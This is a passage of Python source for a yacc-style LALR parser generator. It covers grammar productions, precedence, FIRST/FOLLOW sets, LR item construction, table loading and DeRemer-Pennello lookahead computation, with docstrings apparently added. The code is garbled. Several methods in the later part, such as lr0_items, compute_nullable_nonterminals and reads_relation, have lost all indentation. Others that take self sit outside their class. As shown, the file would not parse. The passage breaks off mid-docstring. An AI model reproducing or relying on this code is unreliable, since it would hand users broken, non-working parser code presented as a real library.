        self.prod = tuple(rhs)
        self.len  = len(self.prod)
    def __str__(self):
        if not self.prod:
            return "%s -> <empty>" % self.name
        return "%s -> %s" % (self.name," ".join(self.prod))
    def __repr__(self):
        return "LRItem("+str(self)+")"
# -----------------------------------------------------------------------------
# rightmost_terminal()
#
# Return the rightmost terminal from a list of symbols. Used in add_production()
# -----------------------------------------------------------------------------
def rightmost_terminal(symbols, terminals):
    """Return the rightmost member of *symbols* found in *terminals*, or None.

    Used by add_production() to derive a rule's default precedence.
    """
    for sym in reversed(symbols):
        if sym in terminals:
            return sym
    return None
# -----------------------------------------------------------------------------
# === GRAMMAR CLASS ===
#
# The following class represents the contents of the specified grammar along
# with various computed properties such as first sets, follow sets, LR items, etc.
# This data is used for critical parts of the table generation process later.
# -----------------------------------------------------------------------------
class GrammarError(YaccError): pass
class Grammar(object):
    """Contents of a grammar plus computed properties (FIRST/FOLLOW sets,
    LR items, etc.) used during LR table generation."""
    def __init__(self,terminals):
        self.Productions  = [None]  # A list of all of the productions.  The first
                                    # entry is always reserved for the purpose of
                                    # building an augmented grammar
        self.Prodnames    = { }     # A dictionary mapping the names of nonterminals to a list of all
                                    # productions of that nonterminal.
        self.Prodmap      = { }     # A dictionary that is only used to detect duplicate
                                    # productions.
        self.Terminals    = { }     # A dictionary mapping the names of terminal symbols to a
                                    # list of the rules where they are used.
        for term in terminals:
            self.Terminals[term] = []
        self.Terminals['error'] = []
        self.Nonterminals = { }     # A dictionary mapping names of nonterminals to a list
                                    # of rule numbers where they are used.
        self.First        = { }     # A dictionary of precomputed FIRST(x) symbols
        self.Follow       = { }     # A dictionary of precomputed FOLLOW(x) symbols
        self.Precedence   = { }     # Precedence rules for each terminal. Contains tuples of the
                                    # form ('right',level) or ('nonassoc', level) or ('left',level)
        self.UsedPrecedence = { }   # Precedence rules that were actually used by the grammar.
                                    # This is only used to provide error checking and to generate
                                    # a warning about unused precedence rules.
        self.Start = None           # Starting symbol for the grammar
    def __len__(self):
        return len(self.Productions)
    def __getitem__(self,index):
        return self.Productions[index]
    # -----------------------------------------------------------------------------
    # set_precedence()
    #
    # Sets the precedence for a given terminal. assoc is the associativity such as
    # 'left','right', or 'nonassoc'.  level is a numeric level.
    #
    # -----------------------------------------------------------------------------
    def set_precedence(self,term,assoc,level):
        """Record precedence (assoc, level) for terminal *term*.

        Must be called before any add_production(); raises GrammarError on
        duplicates or an invalid associativity.
        """
        assert self.Productions == [None],"Must call set_precedence() before add_production()"
        if term in self.Precedence:
            raise GrammarError("Precedence already specified for terminal '%s'" % term)
        if assoc not in ['left','right','nonassoc']:
            raise GrammarError("Associativity must be one of 'left','right', or 'nonassoc'")
        self.Precedence[term] = (assoc,level)
    # -----------------------------------------------------------------------------
    # add_production()
    #
    # Given an action function, this function assembles a production rule and
    # computes its precedence level.
    #
    # The production rule is supplied as a list of symbols.   For example,
    # a rule such as 'expr : expr PLUS term' has a production name of 'expr' and
    # symbols ['expr','PLUS','term'].
    #
    # Precedence is determined by the precedence of the right-most non-terminal
    # or the precedence of a terminal specified by %prec.
    #
    # A variety of error checks are performed to make sure production symbols
    # are valid and that %prec is used correctly.
    # -----------------------------------------------------------------------------
    def add_production(self,prodname,syms,func=None,file='',line=0):
        """Validate and register one production rule.

        Raises GrammarError on bad names, bad literals, misuse of %prec, or
        duplicate rules.  Returns 0 on success.
        """
        if prodname in self.Terminals:
            raise GrammarError("%s:%d: Illegal rule name '%s'. Already defined as a token" % (file,line,prodname))
        if prodname == 'error':
            raise GrammarError("%s:%d: Illegal rule name '%s'. error is a reserved word" % (file,line,prodname))
        if not _is_identifier.match(prodname):
            raise GrammarError("%s:%d: Illegal rule name '%s'" % (file,line,prodname))
        # Look for literal tokens
        for n,s in enumerate(syms):
            if s[0] in "'\"":
                try:
                    # NOTE(review): eval() decodes a quoted literal from the
                    # grammar specification; input is the developer's grammar
                    # text, not end-user data.
                    c = eval(s)
                    if (len(c) > 1):
                        raise GrammarError("%s:%d: Literal token %s in rule '%s' may only be a single character" % (file,line,s, prodname))
                    if not c in self.Terminals:
                        self.Terminals[c] = []
                    syms[n] = c
                    continue
                except SyntaxError:
                    pass
            if not _is_identifier.match(s) and s != '%prec':
                raise GrammarError("%s:%d: Illegal name '%s' in rule '%s'" % (file,line,s, prodname))
        # Determine the precedence level
        if '%prec' in syms:
            if syms[-1] == '%prec':
                raise GrammarError("%s:%d: Syntax error. Nothing follows %%prec" % (file,line))
            if syms[-2] != '%prec':
                raise GrammarError("%s:%d: Syntax error. %%prec can only appear at the end of a grammar rule" % (file,line))
            precname = syms[-1]
            prodprec = self.Precedence.get(precname,None)
            if not prodprec:
                raise GrammarError("%s:%d: Nothing known about the precedence of '%s'" % (file,line,precname))
            else:
                self.UsedPrecedence[precname] = 1
            del syms[-2:]     # Drop %prec from the rule
        else:
            # If no %prec, precedence is determined by the rightmost terminal symbol
            precname = rightmost_terminal(syms,self.Terminals)
            prodprec = self.Precedence.get(precname,('right',0))
        # See if the rule is already in the rulemap
        map = "%s -> %s" % (prodname,syms)
        if map in self.Prodmap:
            m = self.Prodmap[map]
            raise GrammarError("%s:%d: Duplicate rule %s. " % (file,line, m) +
                               "Previous definition at %s:%d" % (m.file, m.line))
        # From this point on, everything is valid.  Create a new Production instance
        pnumber  = len(self.Productions)
        if not prodname in self.Nonterminals:
            self.Nonterminals[prodname] = [ ]
        # Add the production number to Terminals and Nonterminals
        for t in syms:
            if t in self.Terminals:
                self.Terminals[t].append(pnumber)
            else:
                if not t in self.Nonterminals:
                    self.Nonterminals[t] = [ ]
                self.Nonterminals[t].append(pnumber)
        # Create a production and add it to the list of productions
        p = Production(pnumber,prodname,syms,prodprec,func,file,line)
        self.Productions.append(p)
        self.Prodmap[map] = p
        # Add to the global productions list
        try:
            self.Prodnames[prodname].append(p)
        except KeyError:
            self.Prodnames[prodname] = [ p ]
        return 0
    # -----------------------------------------------------------------------------
    # set_start()
    #
    # Sets the starting symbol and creates the augmented grammar.  Production
    # rule 0 is S' -> start where start is the start symbol.
    # -----------------------------------------------------------------------------
    def set_start(self,start=None):
        """Install *start* (default: LHS of the first rule) and build rule 0."""
        if not start:
            start = self.Productions[1].name
        if start not in self.Nonterminals:
            raise GrammarError("start symbol %s undefined" % start)
        self.Productions[0] = Production(0,"S'",[start])
        self.Nonterminals[start].append(0)
        self.Start = start
    # -----------------------------------------------------------------------------
    # find_unreachable()
    #
    # Find all of the nonterminal symbols that can't be reached from the starting
    # symbol.  Returns a list of nonterminals that can't be reached.
    # -----------------------------------------------------------------------------
    def find_unreachable(self):
        """Return the nonterminals not reachable from the start symbol."""
        # Mark all symbols that are reachable from a symbol s
        def mark_reachable_from(s):
            if reachable[s]:
                # We've already reached symbol s.
                return
            reachable[s] = 1
            for p in self.Prodnames.get(s,[]):
                for r in p.prod:
                    mark_reachable_from(r)
        reachable   = { }
        for s in list(self.Terminals) + list(self.Nonterminals):
            reachable[s] = 0
        mark_reachable_from( self.Productions[0].prod[0] )
        return [s for s in list(self.Nonterminals)
                if not reachable[s]]
    # -----------------------------------------------------------------------------
    # infinite_cycles()
    #
    # This function looks at the various parsing rules and tries to detect
    # infinite recursion cycles (grammar rules where there is no possible way
    # to derive a string of only terminals).
    # -----------------------------------------------------------------------------
    def infinite_cycles(self):
        """Return symbols that can never derive a terminal-only string.

        Computed as a fixed point: terminals terminate; a nonterminal
        terminates when some production of it has an all-terminating RHS.
        """
        terminates = {}
        # Terminals:
        for t in self.Terminals:
            terminates[t] = 1
        terminates['$end'] = 1
        # Nonterminals:
        # Initialize to false:
        for n in self.Nonterminals:
            terminates[n] = 0
        # Then propagate termination until no change:
        while 1:
            some_change = 0
            for (n,pl) in self.Prodnames.items():
                # Nonterminal n terminates iff any of its productions terminates.
                for p in pl:
                    # Production p terminates iff all of its rhs symbols terminate.
                    for s in p.prod:
                        if not terminates[s]:
                            # The symbol s does not terminate,
                            # so production p does not terminate.
                            p_terminates = 0
                            break
                    else:
                        # didn't break from the loop,
                        # so every symbol s terminates
                        # so production p terminates.
                        p_terminates = 1
                    if p_terminates:
                        # symbol n terminates!
                        if not terminates[n]:
                            terminates[n] = 1
                            some_change = 1
                        # Don't need to consider any more productions for this n.
                        break
            if not some_change:
                break
        infinite = []
        for (s,term) in terminates.items():
            if not term:
                if not s in self.Prodnames and not s in self.Terminals and s != 'error':
                    # s is used-but-not-defined, and we've already warned of that,
                    # so it would be overkill to say that it's also non-terminating.
                    pass
                else:
                    infinite.append(s)
        return infinite
    # -----------------------------------------------------------------------------
    # undefined_symbols()
    #
    # Find all symbols that were used in the grammar, but not defined as tokens or
    # grammar rules.  Returns a list of tuples (sym, prod) where sym is the symbol
    # and prod is the production where the symbol was used.
    # -----------------------------------------------------------------------------
    def undefined_symbols(self):
        """Return (symbol, production) pairs for used-but-undefined symbols."""
        result = []
        for p in self.Productions:
            if not p: continue
            for s in p.prod:
                if not s in self.Prodnames and not s in self.Terminals and s != 'error':
                    result.append((s,p))
        return result
    # -----------------------------------------------------------------------------
    # unused_terminals()
    #
    # Find all terminals that were defined, but not used by the grammar.  Returns
    # a list of all symbols.
    # -----------------------------------------------------------------------------
    def unused_terminals(self):
        """Return terminals that never appear in any production ('error' exempt)."""
        unused_tok = []
        for s,v in self.Terminals.items():
            if s != 'error' and not v:
                unused_tok.append(s)
        return unused_tok
    # ------------------------------------------------------------------------------
    # unused_rules()
    #
    # Find all grammar rules that were defined,  but not used (maybe not reachable)
    # Returns a list of productions.
    # ------------------------------------------------------------------------------
    def unused_rules(self):
        """Return the first production of every nonterminal never referenced."""
        unused_prod = []
        for s,v in self.Nonterminals.items():
            if not v:
                p = self.Prodnames[s][0]
                unused_prod.append(p)
        return unused_prod
    # -----------------------------------------------------------------------------
    # unused_precedence()
    #
    # Returns a list of tuples (term,precedence) corresponding to precedence
    # rules that were never used by the grammar.  term is the name of the terminal
    # on which precedence was applied and precedence is a string such as 'left' or
    # 'right' corresponding to the type of precedence.
    # -----------------------------------------------------------------------------
    def unused_precedence(self):
        """Return (terminal, assoc) for precedence declarations never used."""
        unused = []
        for termname in self.Precedence:
            if not (termname in self.Terminals or termname in self.UsedPrecedence):
                unused.append((termname,self.Precedence[termname][0]))
        return unused
    # -------------------------------------------------------------------------
    # _first()
    #
    # Compute the value of FIRST1(beta) where beta is a tuple of symbols.
    #
    # During execution of compute_first1, the result may be incomplete.
    # Afterward (e.g., when called from compute_follow()), it will be complete.
    # -------------------------------------------------------------------------
    def _first(self,beta):
        """Return FIRST(beta) for a symbol sequence, using self.First."""
        # We are computing First(x1,x2,x3,...,xn)
        result = [ ]
        for x in beta:
            x_produces_empty = 0
            # Add all the non-<empty> symbols of First[x] to the result.
            for f in self.First[x]:
                if f == '<empty>':
                    x_produces_empty = 1
                else:
                    if f not in result: result.append(f)
            if x_produces_empty:
                # We have to consider the next x in beta,
                # i.e. stay in the loop.
                pass
            else:
                # We don't have to consider any further symbols in beta.
                break
        else:
            # There was no 'break' from the loop,
            # so x_produces_empty was true for all x in beta,
            # so beta produces empty as well.
            result.append('<empty>')
        return result
    # -------------------------------------------------------------------------
    # compute_first()
    #
    # Compute the value of FIRST1(X) for all symbols
    # -------------------------------------------------------------------------
    def compute_first(self):
        """Compute and cache FIRST sets for all symbols (fixed-point loop)."""
        if self.First:
            return self.First
        # Terminals:
        for t in self.Terminals:
            self.First[t] = [t]
        self.First['$end'] = ['$end']
        # Nonterminals:
        # Initialize to the empty set:
        for n in self.Nonterminals:
            self.First[n] = []
        # Then propagate symbols until no change:
        while 1:
            some_change = 0
            for n in self.Nonterminals:
                for p in self.Prodnames[n]:
                    for f in self._first(p.prod):
                        if f not in self.First[n]:
                            self.First[n].append( f )
                            some_change = 1
            if not some_change:
                break
        return self.First
    # ---------------------------------------------------------------------
    # compute_follow()
    #
    # Computes all of the follow sets for every non-terminal symbol.  The
    # follow set is the set of all symbols that might follow a given
    # non-terminal.  See the Dragon book, 2nd Ed. p. 189.
    # ---------------------------------------------------------------------
    def compute_follow(self,start=None):
        """Compute and cache FOLLOW sets for all nonterminals."""
        # If already computed, return the result
        if self.Follow:
            return self.Follow
        # If first sets not computed yet, do that first.
        if not self.First:
            self.compute_first()
        # Add '$end' to the follow list of the start symbol
        for k in self.Nonterminals:
            self.Follow[k] = [ ]
        if not start:
            start = self.Productions[1].name
        self.Follow[start] = [ '$end' ]
        while 1:
            didadd = 0
            for p in self.Productions[1:]:
                # Here is the production set
                for i in range(len(p.prod)):
                    B = p.prod[i]
                    if B in self.Nonterminals:
                        # Okay. We got a non-terminal in a production
                        fst = self._first(p.prod[i+1:])
                        hasempty = 0
                        for f in fst:
                            if f != '<empty>' and f not in self.Follow[B]:
                                self.Follow[B].append(f)
                                didadd = 1
                            if f == '<empty>':
                                hasempty = 1
                        if hasempty or i == (len(p.prod)-1):
                            # Add elements of follow(a) to follow(b)
                            for f in self.Follow[p.name]:
                                if f not in self.Follow[B]:
                                    self.Follow[B].append(f)
                                    didadd = 1
            if not didadd: break
        return self.Follow
    # -----------------------------------------------------------------------------
    # build_lritems()
    #
    # This function walks the list of productions and builds a complete set of the
    # LR items.  The LR items are stored in two ways:  First, they are uniquely
    # numbered and placed in the list _lritems.  Second, a linked list of LR items
    # is built for each production.  For example:
    #
    #   E -> E PLUS E
    #
    # Creates the list
    #
    #  [E -> . E PLUS E, E -> E . PLUS E, E -> E PLUS . E, E -> E PLUS E . ]
    # -----------------------------------------------------------------------------
    def build_lritems(self):
        """Build the LR-item lists and lr_next links for every production."""
        for p in self.Productions:
            lastlri = p
            i = 0
            lr_items = []
            while 1:
                if i > len(p):
                    lri = None
                else:
                    lri = LRItem(p,i)
                    # Precompute the list of productions immediately following
                    try:
                        lri.lr_after = self.Prodnames[lri.prod[i+1]]
                    except (IndexError,KeyError):
                        lri.lr_after = []
                    try:
                        lri.lr_before = lri.prod[i-1]
                    except IndexError:
                        lri.lr_before = None
                lastlri.lr_next = lri
                if not lri: break
                lr_items.append(lri)
                lastlri = lri
                i += 1
            p.lr_items = lr_items
# -----------------------------------------------------------------------------
# == Class LRTable ==
#
# This basic class represents a basic table of LR parsing information.
# Methods for generating the tables are not defined here. They are defined
# in the derived class LRGeneratedTable.
# -----------------------------------------------------------------------------
class VersionError(YaccError): pass
class LRTable(object):
    """Base container for LR parsing tables (action, goto, productions).

    Table-construction lives in the derived class LRGeneratedTable; this
    class only knows how to load previously generated tables from a module
    or a pickle file.
    """
    def __init__(self):
        self.lr_action = None        # Action table
        self.lr_goto = None          # Goto table
        self.lr_productions = None   # List of (Mini)Production objects
        self.lr_method = None        # Table-generation method ('LALR'/'SLR')
    def read_table(self,module):
        """Load tables from a module object or importable module name.

        Returns the table signature; raises VersionError if the table file
        version does not match __tabversion__.
        """
        if isinstance(module,types.ModuleType):
            parsetab = module
        else:
            if sys.version_info[0] < 3:
                exec("import %s as parsetab" % module)
            else:
                env = { }
                exec("import %s as parsetab" % module, env, env)
                parsetab = env['parsetab']
        if parsetab._tabversion != __tabversion__:
            raise VersionError("yacc table file version is out of date")
        self.lr_action = parsetab._lr_action
        self.lr_goto = parsetab._lr_goto
        self.lr_productions = []
        for p in parsetab._lr_productions:
            self.lr_productions.append(MiniProduction(*p))
        self.lr_method = parsetab._lr_method
        return parsetab._lr_signature
    def read_pickle(self,filename):
        """Load tables from a pickle file written by yacc.

        Returns the table signature; raises VersionError on a version
        mismatch.
        """
        try:
            import cPickle as pickle
        except ImportError:
            import pickle
        # Bug fix: use a context manager so the file handle is closed even
        # when VersionError (or a pickle error) is raised part-way through;
        # the original leaked the handle on that path.
        with open(filename,"rb") as in_f:
            tabversion = pickle.load(in_f)
            if tabversion != __tabversion__:
                raise VersionError("yacc table file version is out of date")
            self.lr_method = pickle.load(in_f)
            signature = pickle.load(in_f)
            self.lr_action = pickle.load(in_f)
            self.lr_goto = pickle.load(in_f)
            productions = pickle.load(in_f)
        self.lr_productions = []
        for p in productions:
            self.lr_productions.append(MiniProduction(*p))
        return signature
    # Bind all production function names to callable objects in pdict
    def bind_callables(self,pdict):
        for p in self.lr_productions:
            p.bind(pdict)
# -----------------------------------------------------------------------------
# === LR Generator ===
#
# The following classes and functions are used to generate LR parsing tables on
# a grammar.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# digraph()
# traverse()
#
# The following two functions are used to compute set valued functions
# of the form:
#
# F(x) = F'(x) U U{F(y) | x R y}
#
# This is used to compute the values of Read() sets as well as FOLLOW sets
# in LALR(1) generation.
#
# Inputs: X - An input set
# R - A relation
# FP - Set-valued function
# ------------------------------------------------------------------------------
def digraph(X,R,FP):
    """Compute F(x) = F'(x) U U{F(y) | x R y} for every x in X.

    X is the input set, R the relation (callable returning related nodes),
    and FP the base set-valued function F'.  Used to compute Read() and
    FOLLOW sets during LALR(1) generation; the heavy lifting is done by
    traverse().
    """
    N = dict.fromkeys(X, 0)
    F = { }
    stack = []
    for node in X:
        if N[node] == 0:
            traverse(node,N,stack,F,X,R,FP)
    return F
def traverse(x,N,stack,F,X,R,FP):
    """Depth-first helper for digraph().

    Merges the F sets of nodes related to x into F[x] and collapses
    strongly-connected components so every member of a cycle ends up
    sharing the same F value.  N[x] holds the DFS depth while x is active
    and MAXINT (module-level constant) once its component is finished.
    """
    stack.append(x)
    d = len(stack)
    N[x] = d
    F[x] = FP(x)             # F(X) <- F'(x)
    rel = R(x)               # Get y's related to x
    for y in rel:
        if N[y] == 0:
            traverse(y,N,stack,F,X,R,FP)
        N[x] = min(N[x],N[y])
        for a in F.get(y,[]):
            if a not in F[x]: F[x].append(a)
    if N[x] == d:
        # x is the root of a strongly-connected component: mark every
        # member finished and give it the same F set as x.
        N[stack[-1]] = MAXINT
        F[stack[-1]] = F[x]
        element = stack.pop()
        while element != x:
            N[stack[-1]] = MAXINT
            F[stack[-1]] = F[x]
            element = stack.pop()
class LALRError(YaccError): pass
# -----------------------------------------------------------------------------
# == LRGeneratedTable ==
#
# This class implements the LR table generation algorithm. There are no
# public methods except for write()
# -----------------------------------------------------------------------------
class LRGeneratedTable(LRTable):
    def __init__(self,grammar,method='LALR',log=None):
        """Build the LR parsing tables for *grammar*.

        method is 'SLR' or 'LALR' (default); log, if given, receives
        diagnostic output (defaults to a NullLogger).  Raises LALRError on
        an unsupported method.  Table construction runs immediately.
        """
        if method not in ['SLR','LALR']:
            raise LALRError("Unsupported method %s" % method)
        self.grammar = grammar
        self.lr_method = method
        # Set up the logger
        if not log:
            log = NullLogger()
        self.log = log
        # Internal attributes
        self.lr_action     = {}        # Action table
        self.lr_goto       = {}        # Goto table
        self.lr_productions  = grammar.Productions    # Copy of grammar Production array
        self.lr_goto_cache = {}        # Cache of computed gotos
        self.lr0_cidhash   = {}        # Cache of closures
        self._add_count    = 0         # Internal counter used to detect cycles
        # Diagnostic information filled in by the table generator
        self.sr_conflict   = 0
        self.rr_conflict   = 0
        self.conflicts     = []        # List of conflicts
        self.sr_conflicts  = []
        self.rr_conflicts  = []
        # Build the tables
        self.grammar.build_lritems()
        self.grammar.compute_first()
        self.grammar.compute_follow()
        self.lr_parse_table()
# Compute the LR(0) closure operation on I, where I is a set of LR(0) items.
    def lr0_closure(self,I):
        """Return the LR(0) closure of the item set I as a new list.

        A per-call generation counter (self._add_count) is stamped onto the
        grammar's LRItem objects (x.lr0_added) so the same item is not
        appended twice within one closure computation.
        """
        self._add_count += 1
        # Add everything in I to J
        J = I[:]
        didadd = 1
        while didadd:
            didadd = 0
            # NOTE: J grows while it is being iterated; appended items are
            # still visited by the same for loop, so the outer while acts
            # as a safeguard for re-scanning.
            for j in J:
                for x in j.lr_after:
                    if getattr(x,"lr0_added",0) == self._add_count: continue
                    # Add B --> .G to J
                    J.append(x.lr_next)
                    x.lr0_added = self._add_count
                    didadd = 1
        return J
# Compute the LR(0) goto function goto(I,X) where I is a set
# of LR(0) items and X is a grammar symbol. This function is written
# in a way that guarantees uniqueness of the generated goto sets
# (i.e. the same goto set will never be returned as two different Python
# objects). With uniqueness, we can later do fast set comparisons using
# id(obj) instead of element-wise comparison.
    def lr0_goto(self,I,x):
        """Compute goto(I, x) for item set I and grammar symbol x.

        Results are memoized in self.lr_goto_cache two ways: directly by
        (id(I), x), and through a trie keyed by symbol then item ids so
        that identical goto sets are always returned as the *same* object
        (enabling later id()-based set comparisons).
        """
        # First we look for a previously cached entry
        g = self.lr_goto_cache.get((id(I),x),None)
        if g: return g
        # Now we generate the goto set in a way that guarantees uniqueness
        # of the result
        s = self.lr_goto_cache.get(x,None)
        if not s:
            s = { }
            self.lr_goto_cache[x] = s
        gs = [ ]
        for p in I:
            n = p.lr_next
            if n and n.lr_before == x:
                s1 = s.get(id(n),None)
                if not s1:
                    s1 = { }
                    s[id(n)] = s1
                gs.append(n)
                s = s1
        g = s.get('$end',None)
        if not g:
            if gs:
                g = self.lr0_closure(gs)
                s['$end'] = g
            else:
                # Empty goto: the empty list is cached in the trie but g
                # stays None here, so callers see a falsy result.
                s['$end'] = gs
        self.lr_goto_cache[(id(I),x)] = g
        return g
# Compute the LR(0) sets of item function
def lr0_items(self):
C = [ self.lr0_closure([self.grammar.Productions[0].lr_next]) ]
i = 0
for I in C:
self.lr0_cidhash[id(I)] = i
i += 1
# Loop over the items in C and each grammar symbols
i = 0
while i < len(C):
I = C[i]
i += 1
# Collect all of the symbols that could possibly be in the goto(I,X) sets
asyms = { }
for ii in I:
for s in ii.usyms:
asyms[s] = None
for x in asyms:
g = self.lr0_goto(I,x)
if not g: continue
if id(g) in self.lr0_cidhash: continue
self.lr0_cidhash[id(g)] = len(C)
C.append(g)
return C
# -----------------------------------------------------------------------------
# ==== LALR(1) Parsing ====
#
# LALR(1) parsing is almost exactly the same as SLR except that instead of
# relying upon Follow() sets when performing reductions, a more selective
# lookahead set that incorporates the state of the LR(0) machine is utilized.
# Thus, we mainly just have to focus on calculating the lookahead sets.
#
    # The method used here is due to DeRemer and Pennello (1982).
    #
    # DeRemer, F. L., and T. J. Pennello: "Efficient Computation of LALR(1)
    #     Lookahead Sets", ACM Transactions on Programming Languages and Systems,
    #     Vol. 4, No. 4, Oct. 1982, pp. 615-649
#
# Further details can also be found in:
#
# J. Tremblay and P. Sorenson, "The Theory and Practice of Compiler Writing",
# McGraw-Hill Book Company, (1985).
#
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# compute_nullable_nonterminals()
#
# Creates a dictionary containing all of the non-terminals that might produce
# an empty production.
# -----------------------------------------------------------------------------
def compute_nullable_nonterminals(self):
nullable = {}
num_nullable = 0
while 1:
for p in self.grammar.Productions[1:]:
if p.len == 0:
nullable[p.name] = 1
continue
for t in p.prod:
if not t in nullable: break
else:
nullable[p.name] = 1
if len(nullable) == num_nullable: break
num_nullable = len(nullable)
return nullable
# -----------------------------------------------------------------------------
# find_nonterminal_trans(C)
#
# Given a set of LR(0) items, this functions finds all of the non-terminal
# transitions. These are transitions in which a dot appears immediately before
# a non-terminal. Returns a list of tuples of the form (state,N) where state
# is the state number and N is the nonterminal symbol.
#
# The input C is the set of LR(0) items.
# -----------------------------------------------------------------------------
def find_nonterminal_transitions(self,C):
trans = []
for state in range(len(C)):
for p in C[state]:
if p.lr_index < p.len - 1:
t = (state,p.prod[p.lr_index+1])
if t[1] in self.grammar.Nonterminals:
if t not in trans: trans.append(t)
state = state + 1
return trans
# -----------------------------------------------------------------------------
# dr_relation()
#
# Computes the DR(p,A) relationships for non-terminal transitions. The input
# is a tuple (state,N) where state is a number and N is a nonterminal symbol.
#
# Returns a list of terminals.
# -----------------------------------------------------------------------------
def dr_relation(self,C,trans,nullable):
dr_set = { }
state,N = trans
terms = []
g = self.lr0_goto(C[state],N)
for p in g:
if p.lr_index < p.len - 1:
a = p.prod[p.lr_index+1]
if a in self.grammar.Terminals:
if a not in terms: terms.append(a)
# This extra bit is to handle the start state
if state == 0 and N == self.grammar.Productions[0].prod[0]:
terms.append('$end')
return terms
# -----------------------------------------------------------------------------
# reads_relation()
#
# Computes the READS() relation (p,A) READS (t,C).
# -----------------------------------------------------------------------------
def reads_relation(self,C, trans, empty):
# Look for empty transitions
rel = []
state, N = trans
g = self.lr0_goto(C[state],N)
j = self.lr0_cidhash.get(id(g),-1)
for p in g:
if p.lr_index < p.len - 1:
a = p.prod[p.lr_index + 1]
if a in empty:
rel.append((j,a))
return rel
# -----------------------------------------------------------------------------
# compute_lookback_includes()
#
# Determines the lookback and includes relations
#
# LOOKBACK:
#
# This relation is determined by running the LR(0) state machine forward.
# For example, starting with a production "N : . A B C", we run it forward
# to obtain "N : A B C ." We then build a relationship between this final
# state and the starting state. These relationships are stored in a dictionary
# lookdict.
#
# INCLUDES:
#
# Computes the INCLUDE() relation (p,A) INCLUDES (p',B).
#
# This relation is used to determine non-terminal transitions that occur
# inside of other non-terminal transition states. (p,A) INCLUDES (p', B)
# if the following holds:
#
# B -> LAT, where T -> epsilon and p' -L-> p
#
# L is essentially a prefix (which may be empty), T is a suffix that must be
# able to derive an empty string. State p' must lead to state p with the string L.
#
# -----------------------------------------------------------------------------
    def compute_lookback_includes(self,C,trans,nullable):
        """Compute the LOOKBACK and INCLUDES relations (see banner above).

        Returns (lookdict, includedict): lookdict maps each (state, N)
        transition to its list of (final_state, production) lookbacks;
        includedict maps a transition to the transitions that include it.
        """
        lookdict = {}          # Dictionary of lookback relations
        includedict = {}       # Dictionary of include relations
        # Make a dictionary of non-terminal transitions
        dtrans = {}
        for t in trans:
            dtrans[t] = 1
        # Loop over all transitions and compute lookbacks and includes
        for state,N in trans:
            lookb = []
            includes = []
            for p in C[state]:
                if p.name != N: continue
                # Okay, we have a name match.  We now follow the production all the way
                # through the state machine until we get the . on the right hand side
                lr_index = p.lr_index
                j = state
                while lr_index < p.len - 1:
                    lr_index = lr_index + 1
                    t = p.prod[lr_index]
                    # Check to see if this symbol and state are a non-terminal transition
                    if (j,t) in dtrans:
                        # Yes.  Okay, there is some chance that this is an includes relation
                        # the only way to know for certain is whether the rest of the
                        # production derives empty
                        li = lr_index + 1
                        while li < p.len:
                            if p.prod[li] in self.grammar.Terminals: break      # No forget it
                            if not p.prod[li] in nullable: break
                            li = li + 1
                        else:
                            # while/else: no break, so the remainder derives empty.
                            # Appears to be a relation between (j,t) and (state,N)
                            includes.append((j,t))
                    g = self.lr0_goto(C[j],t)               # Go to next set
                    j = self.lr0_cidhash.get(id(g),-1)      # Go to next state
                # When we get here, j is the final state, now we have to locate the production
                for r in C[j]:
                    if r.name != p.name: continue
                    if r.len != p.len:   continue
                    i = 0
                    # This loop is comparing a production ". A B C" with "A B C ."
                    while i < r.lr_index:
                        if r.prod[i] != p.prod[i+1]: break
                        i = i + 1
                    else:
                        # while/else: all symbols matched, so r is p fully shifted.
                        lookb.append((j,r))
            for i in includes:
                if not i in includedict: includedict[i] = []
                includedict[i].append((state,N))
            lookdict[(state,N)] = lookb
        return lookdict,includedict
# -----------------------------------------------------------------------------
# compute_read_sets()
#
# Given a set of LR(0) items, this function computes the read sets.
#
# Inputs: C = Set of LR(0) items
# ntrans = Set of nonterminal transitions
# nullable = Set of empty transitions
#
# Returns a set containing the read sets
# -----------------------------------------------------------------------------
def compute_read_sets(self, C, ntrans, nullable):
    """Compute the LALR read sets for the given LR(0) item sets.

    C        -- collection of LR(0) item sets
    ntrans   -- set of nonterminal transitions
    nullable -- set of nullable nonterminals

    Returns the read sets produced by the digraph traversal.
    """
    def base_set(x):
        # Direct-read relation DR for transition x
        return self.dr_relation(C, x, nullable)

    def reads_of(x):
        # The 'reads' relation between nonterminal transitions
        return self.reads_relation(C, x, nullable)

    return digraph(ntrans, reads_of, base_set)
# -----------------------------------------------------------------------------
# compute_follow_sets()
#
# Given a set of LR(0) items, a set of non-terminal transitions, a readset,
# and an include set, this function computes the follow sets
#
# Follow(p,A) = Read(p,A) U U {Follow(p',B) | (p,A) INCLUDES (p',B)}
#
# Inputs:
# ntrans = Set of nonterminal transitions
# readsets = Readset (previously computed)
# inclsets = Include sets (previously computed)
#
# Returns a set containing the follow sets
# -----------------------------------------------------------------------------
def compute_follow_sets(self, ntrans, readsets, inclsets):
    """Compute the LALR follow sets.

    Follow(p,A) = Read(p,A) U U {Follow(p',B) | (p,A) INCLUDES (p',B)}

    ntrans   -- set of nonterminal transitions
    readsets -- previously computed read sets
    inclsets -- previously computed include sets

    Returns the follow sets produced by the digraph traversal.
    """
    def base_set(x):
        # Seed each transition with its read set
        return readsets[x]

    def includes_of(x):
        # Transitions related to x through the INCLUDES relation
        return inclsets.get(x, [])

    return digraph(ntrans, includes_of, base_set)
# -----------------------------------------------------------------------------
# add_lookaheads()
#
# Attaches the lookahead symbols to grammar rules.
#
# Inputs: lookbacks - Set of lookback relations
# followset - Computed follow set
#
# This function directly attaches the lookaheads to productions contained
# in the lookbacks set
# -----------------------------------------------------------------------------
def add_lookaheads(self, lookbacks, followset):
    """Attach computed lookahead symbols to grammar productions.

    lookbacks -- mapping of transitions to lists of (state, production)
    followset -- mapping of transitions to their follow symbols

    For each lookback entry, the follow symbols of its transition are
    appended (without duplicates) to the production's per-state
    lookahead list.
    """
    for trans, lb in lookbacks.items():
        # Follow symbols are the same for every production in this entry
        follow = followset.get(trans, [])
        for state, p in lb:
            # Lazily create the per-state lookahead list on the production
            laheads = p.lookaheads.setdefault(state, [])
            for a in follow:
                if a not in laheads:
                    laheads.append(a)
# -----------------------------------------------------------------------------
# add_lalr_lookaheads()
#
# This function does all of the work of adding lookahead information for use
# with LALR parsing
# -----------------------------------------------------------------------------
def add_lalr_lookaheads(self, C):
    """Run the complete LALR lookahead computation over item sets C.

    Orchestrates the DeRemer/Pennello steps: nullable nonterminals,
    nonterminal transitions, read sets, lookback/includes relations,
